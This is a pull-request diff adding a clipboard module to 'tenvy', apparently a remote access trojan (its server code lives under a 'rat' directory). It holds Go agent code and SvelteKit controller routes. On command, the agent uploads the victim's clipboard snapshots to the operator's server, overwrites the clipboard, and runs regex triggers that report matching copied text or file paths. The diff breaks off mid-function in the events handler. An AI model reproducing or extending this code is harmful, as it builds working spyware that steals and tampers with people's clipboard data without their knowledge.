### PR TITLE
Add clipboard manager support for server and client

### DIFF
--- a/shared/types/clipboard.ts
+++ b/shared/types/clipboard.ts
@@ -1,0 +1,100 @@
+export type ClipboardFormat =
+        | 'text'
+        | 'image'
+        | 'files'
+        | 'html'
+        | 'rtf'
+        | 'unknown';
+
+export interface ClipboardTextData {
+        value: string;
+        encoding?: string;
+        length?: number;
+}
+
+export interface ClipboardImageData {
+        mimeType: string;
+        data: string;
+        width?: number;
+        height?: number;
+}
+
+export interface ClipboardFileEntry {
+        name: string;
+        size?: number;
+        mimeType?: string;
+        path?: string;
+        digest?: string;
+}
+
+export interface ClipboardContent {
+        format: ClipboardFormat;
+        text?: ClipboardTextData;
+        image?: ClipboardImageData;
+        files?: ClipboardFileEntry[];
+        metadata?: Record<string, string>;
+}
+
+export interface ClipboardSnapshot {
+        sequence: number;
+        capturedAt: string;
+        source?: string;
+        content?: ClipboardContent;
+}
+
+export interface ClipboardStateEnvelope {
+        requestId?: string;
+        snapshot: ClipboardSnapshot;
+}
+
+export interface ClipboardTriggerCondition {
+        formats?: ClipboardFormat[];
+        pattern?: string;
+        caseSensitive?: boolean;
+}
+
+export interface ClipboardTriggerAction {
+        type: 'notify' | 'command';
+        configuration?: Record<string, unknown>;
+}
+
+export interface ClipboardTrigger {
+        id: string;
+        label: string;
+        description?: string;
+        condition: ClipboardTriggerCondition;
+        action: ClipboardTriggerAction;
+        createdAt: string;
+        updatedAt?: string;
+        active: boolean;
+}
+
+export interface ClipboardTriggerMatch {
+        field: string;
+        value: string;
+}
+
+export interface ClipboardTriggerEvent {
+        eventId: string;
+        triggerId: string;
+        triggerLabel: string;
+        capturedAt: string;
+        sequence: number;
+        requestId?: string;
+        matches?: ClipboardTriggerMatch[];
+        content: ClipboardContent;
+        action: ClipboardTriggerAction;
+}
+
+export interface ClipboardEventEnvelope {
+        events: ClipboardTriggerEvent[];
+}
+
+export interface ClipboardCommandPayload {
+        action: 'get' | 'set' | 'sync-triggers';
+        requestId?: string;
+        content?: ClipboardContent;
+        triggers?: ClipboardTrigger[];
+        source?: string;
+        sequence?: number;
+}

--- a/shared/types/messages.ts
+++ b/shared/types/messages.ts
@@ -2,6 +2,7 @@ import type { AgentConfig } from './config';
 import type { AgentMetrics, AgentStatus } from './agent';
 import type { RemoteDesktopCommandPayload } from './remote-desktop';
 import type { AudioControlCommandPayload } from './audio';
+import type { ClipboardCommandPayload } from './clipboard';
 
 export type CommandName =
         | 'ping'
@@ -9,7 +10,8 @@ export type CommandName =
         | 'remote-desktop'
         | 'system-info'
         | 'open-url'
-        | 'audio-control';
+        | 'audio-control'
+        | 'clipboard';
 
 export interface PingCommandPayload {
         message?: string;
@@ -38,7 +40,8 @@ export type CommandPayload =
         | RemoteDesktopCommandPayload
         | SystemInfoCommandPayload
         | OpenUrlCommandPayload
-        | AudioControlCommandPayload;
+        | AudioControlCommandPayload
+        | ClipboardCommandPayload;
 
 export interface CommandInput {
         name: CommandName;

--- a/tenvy-client/internal/modules/management/clipboard/manager.go
+++ b/tenvy-client/internal/modules/management/clipboard/manager.go
@@ -1,0 +1,478 @@
+package clipboard
+
+import (
+	"bytes"
+	"context"
+	"crypto/rand"
+	"encoding/hex"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"net/url"
+	"regexp"
+	"strings"
+	"sync"
+	"sync/atomic"
+	"time"
+
+	"github.com/rootbay/tenvy-client/internal/protocol"
+)
+
+type (
+	Command       = protocol.Command
+	CommandResult = protocol.CommandResult
+)
+
+type Logger interface {
+	Printf(format string, args ...interface{})
+}
+
+type HTTPDoer interface {
+	Do(req *http.Request) (*http.Response, error)
+}
+
+type Config struct {
+	AgentID   string
+	BaseURL   string
+	AuthKey   string
+	Client    HTTPDoer
+	Logger    Logger
+	UserAgent string
+}
+
+type Manager struct {
+	cfg      atomic.Value // Config
+	mu       sync.Mutex
+	sequence uint64
+	state    ClipboardSnapshot
+	triggers map[string]*compiledTrigger
+}
+
+type compiledTrigger struct {
+	trigger ClipboardTrigger
+	formats map[ClipboardFormat]struct{}
+	pattern string
+	regex   *regexp.Regexp
+}
+
+const requestTimeout = 10 * time.Second
+
+func NewManager(cfg Config) *Manager {
+	manager := &Manager{
+		triggers: make(map[string]*compiledTrigger),
+	}
+	manager.updateConfig(cfg)
+	return manager
+}
+
+func (m *Manager) UpdateConfig(cfg Config) {
+	if m == nil {
+		return
+	}
+	m.updateConfig(cfg)
+}
+
+func (m *Manager) updateConfig(cfg Config) {
+	m.cfg.Store(cfg)
+}
+
+func (m *Manager) config() Config {
+	if value := m.cfg.Load(); value != nil {
+		if cfg, ok := value.(Config); ok {
+			return cfg
+		}
+	}
+	return Config{}
+}
+
+func (m *Manager) logf(format string, args ...interface{}) {
+	cfg := m.config()
+	if cfg.Logger == nil {
+		return
+	}
+	cfg.Logger.Printf(format, args...)
+}
+
+func (m *Manager) userAgent() string {
+	cfg := m.config()
+	ua := strings.TrimSpace(cfg.UserAgent)
+	if ua != "" {
+		return ua
+	}
+	return "tenvy-client"
+}
+
+func (m *Manager) Shutdown() {}
+
+func (m *Manager) HandleCommand(ctx context.Context, cmd Command) CommandResult {
+	completedAt := time.Now().UTC().Format(time.RFC3339Nano)
+	result := CommandResult{
+		CommandID:   cmd.ID,
+		CompletedAt: completedAt,
+	}
+
+	var payload ClipboardCommandPayload
+	if len(cmd.Payload) > 0 {
+		if err := json.Unmarshal(cmd.Payload, &payload); err != nil {
+			result.Success = false
+			result.Error = fmt.Sprintf("invalid clipboard payload: %v", err)
+			return result
+		}
+	}
+
+	action := strings.TrimSpace(payload.Action)
+	if action == "" {
+		result.Success = false
+		result.Error = "clipboard action is required"
+		return result
+	}
+
+	switch action {
+	case "get":
+		snapshot := m.snapshot()
+		requestID := strings.TrimSpace(payload.RequestID)
+		if requestID != "" {
+			go m.dispatchState(requestID, snapshot)
+		}
+		result.Success = true
+		result.Output = fmt.Sprintf("sequence %d", snapshot.Sequence)
+		return result
+	case "set":
+		if payload.Content == nil {
+			result.Success = false
+			result.Error = "clipboard content missing"
+			return result
+		}
+		source := strings.TrimSpace(payload.Source)
+		if source == "" {
+			source = "agent"
+		}
+		snapshot := m.applyContent(payload.Content, source, payload.Sequence)
+		requestID := strings.TrimSpace(payload.RequestID)
+		if requestID != "" {
+			go m.dispatchState(requestID, snapshot)
+		}
+		result.Success = true
+		result.Output = fmt.Sprintf("sequence %d", snapshot.Sequence)
+		return result
+	case "sync-triggers":
+		if err := m.syncTriggers(payload.Triggers); err != nil {
+			result.Success = false
+			result.Error = err.Error()
+			return result
+		}
+		result.Success = true
+		result.Output = fmt.Sprintf("synced %d triggers", len(payload.Triggers))
+		return result
+	default:
+		result.Success = false
+		result.Error = fmt.Sprintf("unsupported clipboard action: %s", action)
+		return result
+	}
+}
+
+func (m *Manager) snapshot() ClipboardSnapshot {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+	snapshot := cloneSnapshot(m.state)
+	if snapshot.CapturedAt == "" {
+		snapshot.CapturedAt = time.Now().UTC().Format(time.RFC3339Nano)
+	}
+	snapshot.Sequence = m.sequence
+	return snapshot
+}
+
+func (m *Manager) applyContent(content *ClipboardContent, source string, requestedSequence *uint64) ClipboardSnapshot {
+	now := time.Now().UTC()
+	cloned := cloneContent(content)
+
+	m.mu.Lock()
+	m.sequence++
+	if requestedSequence != nil && *requestedSequence > m.sequence {
+		m.sequence = *requestedSequence
+	}
+	seq := m.sequence
+	snapshot := ClipboardSnapshot{
+		Sequence:   seq,
+		CapturedAt: now.Format(time.RFC3339Nano),
+		Source:     source,
+		Content:    cloned,
+	}
+	m.state = cloneSnapshot(snapshot)
+	events := m.evaluateTriggersLocked(snapshot)
+	m.mu.Unlock()
+
+	if len(events) > 0 {
+		go m.dispatchEvents(events)
+	}
+
+	return snapshot
+}
+
+func (m *Manager) syncTriggers(triggers []ClipboardTrigger) error {
+	compiled := make(map[string]*compiledTrigger, len(triggers))
+	for _, trigger := range triggers {
+		record := &compiledTrigger{
+			trigger: trigger,
+			pattern: strings.TrimSpace(trigger.Condition.Pattern),
+		}
+		if len(trigger.Condition.Formats) > 0 {
+			record.formats = make(map[ClipboardFormat]struct{}, len(trigger.Condition.Formats))
+			for _, format := range trigger.Condition.Formats {
+				record.formats[format] = struct{}{}
+			}
+		}
+		if record.pattern != "" {
+			var err error
+			if trigger.Condition.CaseSensitive {
+				record.regex, err = regexp.Compile(record.pattern)
+			} else {
+				record.regex, err = regexp.Compile("(?i)" + record.pattern)
+			}
+			if err != nil {
+				return fmt.Errorf("invalid trigger pattern (%s): %w", trigger.ID, err)
+			}
+		}
+		compiled[trigger.ID] = record
+	}
+
+	m.mu.Lock()
+	m.triggers = compiled
+	m.mu.Unlock()
+	return nil
+}
+
+func (m *Manager) evaluateTriggersLocked(snapshot ClipboardSnapshot) []ClipboardTriggerEvent {
+	if snapshot.Content == nil || len(m.triggers) == 0 {
+		return nil
+	}
+
+	events := make([]ClipboardTriggerEvent, 0, len(m.triggers))
+	for _, entry := range m.triggers {
+		if entry == nil || !entry.trigger.Active {
+			continue
+		}
+		if len(entry.formats) > 0 {
+			if _, ok := entry.formats[snapshot.Content.Format]; !ok {
+				continue
+			}
+		}
+		matches := entry.matches(snapshot.Content)
+		if entry.pattern != "" && len(matches) == 0 {
+			continue
+		}
+		event := ClipboardTriggerEvent{
+			EventID:      randomEventID(),
+			TriggerID:    entry.trigger.ID,
+			TriggerLabel: entry.trigger.Label,
+			CapturedAt:   snapshot.CapturedAt,
+			Sequence:     snapshot.Sequence,
+			Matches:      matches,
+			Content:      *cloneContent(snapshot.Content),
+			Action:       entry.trigger.Action,
+		}
+		events = append(events, event)
+	}
+	if len(events) == 0 {
+		return nil
+	}
+	return events
+}
+
+func (t *compiledTrigger) matches(content *ClipboardContent) []ClipboardTriggerMatch {
+	if content == nil {
+		return nil
+	}
+	if t.regex == nil {
+		return []ClipboardTriggerMatch{{Field: "format", Value: string(content.Format)}}
+	}
+	matches := make([]ClipboardTriggerMatch, 0)
+	switch content.Format {
+	case "text":
+		if content.Text != nil {
+			segments := t.regex.FindAllString(content.Text.Value, -1)
+			for _, segment := range segments {
+				if segment != "" {
+					matches = append(matches, ClipboardTriggerMatch{Field: "text", Value: segment})
+				}
+			}
+		}
+	case "files":
+		for _, file := range content.Files {
+			if file.Name != "" && t.regex.MatchString(file.Name) {
+				matches = append(matches, ClipboardTriggerMatch{Field: "file", Value: file.Name})
+				continue
+			}
+			if file.Path != "" && t.regex.MatchString(file.Path) {
+				matches = append(matches, ClipboardTriggerMatch{Field: "file", Value: file.Path})
+			}
+		}
+	default:
+		if len(content.Metadata) > 0 {
+			for key, value := range content.Metadata {
+				if value != "" && t.regex.MatchString(value) {
+					matches = append(matches, ClipboardTriggerMatch{Field: key, Value: value})
+				}
+			}
+		}
+	}
+	return matches
+}
+
+func (m *Manager) dispatchState(requestID string, snapshot ClipboardSnapshot) {
+	ctx, cancel := context.WithTimeout(context.Background(), requestTimeout)
+	defer cancel()
+	if err := m.sendState(ctx, requestID, snapshot); err != nil {
+		m.logf("clipboard: failed to dispatch state (%s): %v", requestID, err)
+	}
+}
+
+func (m *Manager) dispatchEvents(events []ClipboardTriggerEvent) {
+	if len(events) == 0 {
+		return
+	}
+	ctx, cancel := context.WithTimeout(context.Background(), requestTimeout)
+	defer cancel()
+	if err := m.sendEvents(ctx, events); err != nil {
+		m.logf("clipboard: failed to dispatch events: %v", err)
+	}
+}
+
+func (m *Manager) sendState(ctx context.Context, requestID string, snapshot ClipboardSnapshot) error {
+	payload := ClipboardStateEnvelope{RequestID: requestID, Snapshot: snapshot}
+	data, err := json.Marshal(payload)
+	if err != nil {
+		return err
+	}
+
+	cfg := m.config()
+	baseURL := strings.TrimRight(strings.TrimSpace(cfg.BaseURL), "/")
+	if baseURL == "" {
+		return fmt.Errorf("clipboard: missing base URL")
+	}
+	if cfg.Client == nil {
+		return fmt.Errorf("clipboard: missing http client")
+	}
+
+	endpoint := fmt.Sprintf("%s/api/agents/%s/clipboard/state", baseURL, url.PathEscape(cfg.AgentID))
+	req, err := http.NewRequestWithContext(ctx, http.MethodPost, endpoint, bytes.NewReader(data))
+	if err != nil {
+		return err
+	}
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set("Accept", "application/json")
+	if ua := strings.TrimSpace(m.userAgent()); ua != "" {
+		req.Header.Set("User-Agent", ua)
+	}
+	if key := strings.TrimSpace(cfg.AuthKey); key != "" {
+		req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", key))
+	}
+
+	resp, err := cfg.Client.Do(req)
+	if err != nil {
+		return err
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode >= 300 {
+		body, _ := io.ReadAll(io.LimitReader(resp.Body, 1024))
+		message := strings.TrimSpace(string(body))
+		if message == "" {
+			message = fmt.Sprintf("status %d", resp.StatusCode)
+		}
+		return fmt.Errorf("clipboard state upload failed: %s", message)
+	}
+	return nil
+}
+
+func (m *Manager) sendEvents(ctx context.Context, events []ClipboardTriggerEvent) error {
+	payload := ClipboardEventEnvelope{Events: events}
+	data, err := json.Marshal(payload)
+	if err != nil {
+		return err
+	}
+
+	cfg := m.config()
+	baseURL := strings.TrimRight(strings.TrimSpace(cfg.BaseURL), "/")
+	if baseURL == "" {
+		return fmt.Errorf("clipboard: missing base URL")
+	}
+	if cfg.Client == nil {
+		return fmt.Errorf("clipboard: missing http client")
+	}
+
+	endpoint := fmt.Sprintf("%s/api/agents/%s/clipboard/events", baseURL, url.PathEscape(cfg.AgentID))
+	req, err := http.NewRequestWithContext(ctx, http.MethodPost, endpoint, bytes.NewReader(data))
+	if err != nil {
+		return err
+	}
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set("Accept", "application/json")
+	if ua := strings.TrimSpace(m.userAgent()); ua != "" {
+		req.Header.Set("User-Agent", ua)
+	}
+	if key := strings.TrimSpace(cfg.AuthKey); key != "" {
+		req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", key))
+	}
+
+	resp, err := cfg.Client.Do(req)
+	if err != nil {
+		return err
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode >= 300 {
+		body, _ := io.ReadAll(io.LimitReader(resp.Body, 1024))
+		message := strings.TrimSpace(string(body))
+		if message == "" {
+			message = fmt.Sprintf("status %d", resp.StatusCode)
+		}
+		return fmt.Errorf("clipboard event upload failed: %s", message)
+	}
+	return nil
+}
+
+func cloneSnapshot(snapshot ClipboardSnapshot) ClipboardSnapshot {
+	cloned := snapshot
+	if snapshot.Content != nil {
+		cloned.Content = cloneContent(snapshot.Content)
+	}
+	return cloned
+}
+
+func cloneContent(content *ClipboardContent) *ClipboardContent {
+	if content == nil {
+		return nil
+	}
+	cloned := *content
+	if content.Text != nil {
+		text := *content.Text
+		cloned.Text = &text
+	}
+	if content.Image != nil {
+		image := *content.Image
+		cloned.Image = &image
+	}
+	if len(content.Files) > 0 {
+		files := make([]ClipboardFileEntry, len(content.Files))
+		copy(files, content.Files)
+		cloned.Files = files
+	}
+	if len(content.Metadata) > 0 {
+		metadata := make(map[string]string, len(content.Metadata))
+		for key, value := range content.Metadata {
+			metadata[key] = value
+		}
+		cloned.Metadata = metadata
+	}
+	return &cloned
+}
+
+func randomEventID() string {
+	buf := make([]byte, 16)
+	if _, err := rand.Read(buf); err != nil {
+		return fmt.Sprintf("evt-%d", time.Now().UnixNano())
+	}
+	return hex.EncodeToString(buf)
+}

--- a/tenvy-client/internal/modules/management/clipboard/types.go
+++ b/tenvy-client/internal/modules/management/clipboard/types.go
@@ -1,0 +1,96 @@
+package clipboard
+
+type ClipboardFormat string
+
+type ClipboardTextData struct {
+	Value    string `json:"value"`
+	Encoding string `json:"encoding,omitempty"`
+	Length   int    `json:"length,omitempty"`
+}
+
+type ClipboardImageData struct {
+	MimeType string `json:"mimeType"`
+	Data     string `json:"data"`
+	Width    int    `json:"width,omitempty"`
+	Height   int    `json:"height,omitempty"`
+}
+
+type ClipboardFileEntry struct {
+	Name     string `json:"name"`
+	Size     int64  `json:"size,omitempty"`
+	MimeType string `json:"mimeType,omitempty"`
+	Path     string `json:"path,omitempty"`
+	Digest   string `json:"digest,omitempty"`
+}
+
+type ClipboardContent struct {
+	Format   ClipboardFormat      `json:"format"`
+	Text     *ClipboardTextData   `json:"text,omitempty"`
+	Image    *ClipboardImageData  `json:"image,omitempty"`
+	Files    []ClipboardFileEntry `json:"files,omitempty"`
+	Metadata map[string]string    `json:"metadata,omitempty"`
+}
+
+type ClipboardSnapshot struct {
+	Sequence   uint64            `json:"sequence"`
+	CapturedAt string            `json:"capturedAt"`
+	Source     string            `json:"source,omitempty"`
+	Content    *ClipboardContent `json:"content,omitempty"`
+}
+
+type ClipboardStateEnvelope struct {
+	RequestID string            `json:"requestId,omitempty"`
+	Snapshot  ClipboardSnapshot `json:"snapshot"`
+}
+
+type ClipboardTriggerCondition struct {
+	Formats       []ClipboardFormat `json:"formats,omitempty"`
+	Pattern       string            `json:"pattern,omitempty"`
+	CaseSensitive bool              `json:"caseSensitive,omitempty"`
+}
+
+type ClipboardTriggerAction struct {
+	Type          string         `json:"type"`
+	Configuration map[string]any `json:"configuration,omitempty"`
+}
+
+type ClipboardTrigger struct {
+	ID          string                    `json:"id"`
+	Label       string                    `json:"label"`
+	Description string                    `json:"description,omitempty"`
+	Condition   ClipboardTriggerCondition `json:"condition"`
+	Action      ClipboardTriggerAction    `json:"action"`
+	CreatedAt   string                    `json:"createdAt"`
+	UpdatedAt   string                    `json:"updatedAt,omitempty"`
+	Active      bool                      `json:"active"`
+}
+
+type ClipboardTriggerMatch struct {
+	Field string `json:"field"`
+	Value string `json:"value"`
+}
+
+type ClipboardTriggerEvent struct {
+	EventID      string                  `json:"eventId"`
+	TriggerID    string                  `json:"triggerId"`
+	TriggerLabel string                  `json:"triggerLabel"`
+	CapturedAt   string                  `json:"capturedAt"`
+	Sequence     uint64                  `json:"sequence"`
+	RequestID    string                  `json:"requestId,omitempty"`
+	Matches      []ClipboardTriggerMatch `json:"matches,omitempty"`
+	Content      ClipboardContent        `json:"content"`
+	Action       ClipboardTriggerAction  `json:"action"`
+}
+
+type ClipboardCommandPayload struct {
+	Action    string             `json:"action"`
+	RequestID string             `json:"requestId,omitempty"`
+	Content   *ClipboardContent  `json:"content,omitempty"`
+	Triggers  []ClipboardTrigger `json:"triggers,omitempty"`
+	Source    string             `json:"source,omitempty"`
+	Sequence  *uint64            `json:"sequence,omitempty"`
+}
+
+type ClipboardEventEnvelope struct {
+	Events []ClipboardTriggerEvent `json:"events"`
+}

--- a/tenvy-server/src/lib/components/workspace/action-log.svelte
+++ b/tenvy-server/src/lib/components/workspace/action-log.svelte
@@ -22,9 +22,11 @@
 
         const statusVariant: Record<WorkspaceLogStatus, 'default' | 'secondary' | 'outline' | 'destructive'> = {
                 queued: 'default',
+                pending: 'default',
                 draft: 'outline',
                 'in-progress': 'secondary',
-                complete: 'secondary'
+                complete: 'secondary',
+                failed: 'destructive'
         };
 
         function getStatusVariant(status: WorkspaceLogStatus) {

--- a/tenvy-server/src/lib/server/rat/clipboard.ts
+++ b/tenvy-server/src/lib/server/rat/clipboard.ts
@@ -1,0 +1,195 @@
+import { randomUUID } from 'crypto';
+import type {
+        ClipboardEventEnvelope,
+        ClipboardSnapshot,
+        ClipboardStateEnvelope,
+        ClipboardTrigger,
+        ClipboardTriggerEvent
+} from '$lib/types/clipboard';
+
+const DEFAULT_TIMEOUT_MS = 10_000;
+const MAX_EVENT_HISTORY = 50;
+
+function clone<T>(input: T): T {
+        if (input === undefined || input === null) {
+                return input as T;
+        }
+        return structuredClone(input);
+}
+
+export class ClipboardError extends Error {
+        status: number;
+
+        constructor(message: string, status = 400) {
+                super(message);
+                this.name = 'ClipboardError';
+                this.status = status;
+        }
+}
+
+interface ClipboardStateRecord {
+        snapshot?: ClipboardSnapshot;
+        updatedAt?: Date;
+}
+
+interface PendingRequest {
+        resolve: (snapshot: ClipboardSnapshot) => void;
+        reject: (error: ClipboardError) => void;
+        timer: ReturnType<typeof setTimeout>;
+}
+
+function ensurePositiveTimeout(timeout?: number): number {
+        if (typeof timeout !== 'number' || Number.isNaN(timeout) || timeout <= 0) {
+                return DEFAULT_TIMEOUT_MS;
+        }
+        return Math.min(timeout, 60_000);
+}
+
+export class ClipboardManager {
+        private states = new Map<string, ClipboardStateRecord>();
+        private pending = new Map<string, Map<string, PendingRequest>>();
+        private triggers = new Map<string, ClipboardTrigger[]>();
+        private events = new Map<string, ClipboardTriggerEvent[]>();
+
+        getState(agentId: string): ClipboardSnapshot | undefined {
+                const record = this.states.get(agentId);
+                if (!record?.snapshot) {
+                        return undefined;
+                }
+                return clone(record.snapshot);
+        }
+
+        listTriggers(agentId: string): ClipboardTrigger[] {
+                const triggers = this.triggers.get(agentId);
+                if (!triggers) {
+                        return [];
+                }
+                return clone(triggers);
+        }
+
+        setTriggers(agentId: string, triggers: ClipboardTrigger[]): void {
+                this.triggers.set(agentId, clone(triggers));
+        }
+
+        listEvents(agentId: string): ClipboardTriggerEvent[] {
+                const items = this.events.get(agentId);
+                if (!items) {
+                        return [];
+                }
+                return clone(items);
+        }
+
+        appendEvents(agentId: string, envelope: ClipboardEventEnvelope): ClipboardTriggerEvent[] {
+                if (!envelope?.events?.length) {
+                        return [];
+                }
+                const record = this.events.get(agentId) ?? [];
+                const merged = [...envelope.events.map((event) => clone(event)), ...record];
+                const bounded = merged.slice(0, MAX_EVENT_HISTORY);
+                this.events.set(agentId, bounded);
+                return bounded;
+        }
+
+        clearEvents(agentId: string): void {
+                this.events.delete(agentId);
+        }
+
+        ingestState(agentId: string, envelope: ClipboardStateEnvelope): ClipboardSnapshot {
+                if (!envelope || typeof envelope !== 'object') {
+                        throw new ClipboardError('Clipboard payload is required', 400);
+                }
+                const snapshot = envelope.snapshot;
+                if (!snapshot) {
+                        throw new ClipboardError('Clipboard snapshot is required', 400);
+                }
+                const cloned = clone(snapshot);
+
+                const record = this.states.get(agentId) ?? {};
+                const currentSequence = record.snapshot?.sequence ?? -1;
+                if (currentSequence <= cloned.sequence) {
+                        record.snapshot = cloned;
+                        record.updatedAt = new Date();
+                        this.states.set(agentId, record);
+                }
+
+                if (envelope.requestId) {
+                        this.resolvePending(agentId, envelope.requestId, cloned);
+                }
+
+                return cloned;
+        }
+
+        createRequest(agentId: string, timeout?: number): { requestId: string; wait: Promise<ClipboardSnapshot> } {
+                const requestId = randomUUID();
+                const wait = this.waitForState(agentId, requestId, timeout);
+                return { requestId, wait };
+        }
+
+        waitForState(agentId: string, requestId: string, timeout?: number): Promise<ClipboardSnapshot> {
+                const duration = ensurePositiveTimeout(timeout);
+                return new Promise<ClipboardSnapshot>((resolve, reject) => {
+                        const timer = setTimeout(() => {
+                                const pendingForAgent = this.pending.get(agentId);
+                                pendingForAgent?.delete(requestId);
+                                if (pendingForAgent && pendingForAgent.size === 0) {
+                                        this.pending.delete(agentId);
+                                }
+                                reject(new ClipboardError('Timed out waiting for clipboard response', 504));
+                        }, duration);
+
+                        const entry: PendingRequest = {
+                                resolve: (snapshot) => {
+                                        clearTimeout(timer);
+                                        resolve(clone(snapshot));
+                                },
+                                reject: (err) => {
+                                        clearTimeout(timer);
+                                        reject(err);
+                                },
+                                timer
+                        };
+
+                        const pendingForAgent = this.pending.get(agentId) ?? new Map<string, PendingRequest>();
+                        pendingForAgent.set(requestId, entry);
+                        this.pending.set(agentId, pendingForAgent);
+                });
+        }
+
+        private resolvePending(agentId: string, requestId: string, snapshot: ClipboardSnapshot) {
+                const pendingForAgent = this.pending.get(agentId);
+                const entry = pendingForAgent?.get(requestId);
+                if (!entry) {
+                        return;
+                }
+                pendingForAgent?.delete(requestId);
+                if (pendingForAgent && pendingForAgent.size === 0) {
+                        this.pending.delete(agentId);
+                }
+                try {
+                        entry.resolve(snapshot);
+                } catch (err) {
+                        // eslint-disable-next-line no-console
+                        console.error('Failed to resolve clipboard request', err);
+                }
+        }
+
+        failPending(agentId: string, requestId: string, error: ClipboardError) {
+                const pendingForAgent = this.pending.get(agentId);
+                const entry = pendingForAgent?.get(requestId);
+                if (!entry) {
+                        return;
+                }
+                pendingForAgent?.delete(requestId);
+                if (pendingForAgent && pendingForAgent.size === 0) {
+                        this.pending.delete(agentId);
+                }
+                try {
+                        entry.reject(error);
+                } catch (err) {
+                        // eslint-disable-next-line no-console
+                        console.error('Failed to reject clipboard request', err);
+                }
+        }
+}
+
+export const clipboardManager = new ClipboardManager();

--- a/tenvy-server/src/lib/types/clipboard.ts
+++ b/tenvy-server/src/lib/types/clipboard.ts
@@ -1,0 +1,1 @@
+export * from '../../../../shared/types/clipboard';

--- a/tenvy-server/src/lib/workspace/types.ts
+++ b/tenvy-server/src/lib/workspace/types.ts
@@ -1,4 +1,10 @@
-export type WorkspaceLogStatus = 'draft' | 'queued' | 'in-progress' | 'complete';
+export type WorkspaceLogStatus =
+        | 'draft'
+        | 'queued'
+        | 'pending'
+        | 'in-progress'
+        | 'complete'
+        | 'failed';
 
 export interface WorkspaceLogEntry {
         id: string;

--- a/tenvy-server/src/routes/api/agents/[id]/clipboard/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/clipboard/+server.ts
@@ -1,0 +1,135 @@
+import { json, error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { clipboardManager, ClipboardError } from '$lib/server/rat/clipboard';
+import { registry, RegistryError } from '$lib/server/rat/store';
+import type {
+        ClipboardCommandPayload,
+        ClipboardContent,
+        ClipboardSnapshot,
+        ClipboardTrigger,
+        ClipboardTriggerEvent
+} from '$lib/types/clipboard';
+
+interface ClipboardStateResponse {
+        state?: ClipboardSnapshot;
+        triggers: ClipboardTrigger[];
+        events: ClipboardTriggerEvent[];
+}
+
+type ClipboardActionRequest =
+        | {
+                  action: 'refresh';
+                  waitMs?: number;
+          }
+        | {
+                  action: 'set';
+                  waitMs?: number;
+                  content: ClipboardContent;
+                  source?: string;
+          };
+
+function assertClipboardContent(input: ClipboardContent | undefined): asserts input is ClipboardContent {
+        if (!input || typeof input !== 'object' || typeof input.format !== 'string') {
+                throw error(400, 'Clipboard content must include a format');
+        }
+}
+
+export const GET: RequestHandler = ({ params }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        const state = clipboardManager.getState(id);
+        const triggers = clipboardManager.listTriggers(id);
+        const events = clipboardManager.listEvents(id);
+
+        return json({ state, triggers, events } satisfies ClipboardStateResponse);
+};
+
+export const POST: RequestHandler = async ({ params, request }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        let payload: ClipboardActionRequest;
+        try {
+                payload = (await request.json()) as ClipboardActionRequest;
+        } catch (err) {
+                throw error(400, 'Invalid clipboard action payload');
+        }
+
+        if (!payload || typeof payload !== 'object' || !('action' in payload)) {
+                throw error(400, 'Clipboard action is required');
+        }
+
+        const waitMs = 'waitMs' in payload ? payload.waitMs : undefined;
+
+        switch (payload.action) {
+                case 'refresh': {
+                        const { requestId, wait } = clipboardManager.createRequest(id, waitMs);
+                        try {
+                                const command: ClipboardCommandPayload = { action: 'get', requestId };
+                                registry.queueCommand(id, { name: 'clipboard', payload: command });
+                        } catch (err) {
+                                if (err instanceof RegistryError) {
+                                        clipboardManager.failPending(id, requestId, new ClipboardError(err.message, err.status));
+                                        throw error(err.status, err.message);
+                                }
+                                clipboardManager.failPending(
+                                        id,
+                                        requestId,
+                                        new ClipboardError('Failed to queue clipboard request', 500)
+                                );
+                                throw error(500, 'Failed to queue clipboard request');
+                        }
+
+                        try {
+                                const state = await wait;
+                                return json({ state } satisfies Pick<ClipboardStateResponse, 'state'>);
+                        } catch (err) {
+                                if (err instanceof ClipboardError) {
+                                        throw error(err.status, err.message);
+                                }
+                                throw error(500, 'Failed to retrieve clipboard snapshot');
+                        }
+                }
+                case 'set': {
+                        assertClipboardContent(payload.content);
+                        const { requestId, wait } = clipboardManager.createRequest(id, waitMs);
+                        try {
+                                const command: ClipboardCommandPayload = {
+                                        action: 'set',
+                                        requestId,
+                                        content: payload.content,
+                                        source: payload.source ?? 'controller'
+                                };
+                                registry.queueCommand(id, { name: 'clipboard', payload: command });
+                        } catch (err) {
+                                if (err instanceof RegistryError) {
+                                        clipboardManager.failPending(id, requestId, new ClipboardError(err.message, err.status));
+                                        throw error(err.status, err.message);
+                                }
+                                clipboardManager.failPending(
+                                        id,
+                                        requestId,
+                                        new ClipboardError('Failed to queue clipboard update', 500)
+                                );
+                                throw error(500, 'Failed to queue clipboard update');
+                        }
+
+                        try {
+                                const state = await wait;
+                                return json({ state } satisfies Pick<ClipboardStateResponse, 'state'>);
+                        } catch (err) {
+                                if (err instanceof ClipboardError) {
+                                        throw error(err.status, err.message);
+                                }
+                                throw error(500, 'Failed to update clipboard');
+                        }
+                }
+                default:
+                        throw error(400, 'Unsupported clipboard action');
+        }
+};

--- a/tenvy-server/src/routes/api/agents/[id]/clipboard/events/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/clipboard/events/+server.ts
@@ -1,0 +1,73 @@
+import { json, error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { clipboardManager } from '$lib/server/rat/clipboard';
+import type { ClipboardEventEnvelope, ClipboardTriggerEvent } from '$lib/types/clipboard';
+
+function describeEvent(agentId: string, event: ClipboardTriggerEvent): string {
+        const parts = [`agent ${agentId}`, `trigger ${event.triggerLabel}`];
+        if (event.content?.format) {
+                parts.push(`format ${event.content.format}`);
+        }
+        return parts.join(' · ');
+}
+
+function handleAction(agentId: string, event: ClipboardTriggerEvent) {
+        const actionType = event.action?.type ?? 'notify';
+        switch (actionType) {
+                case 'notify':
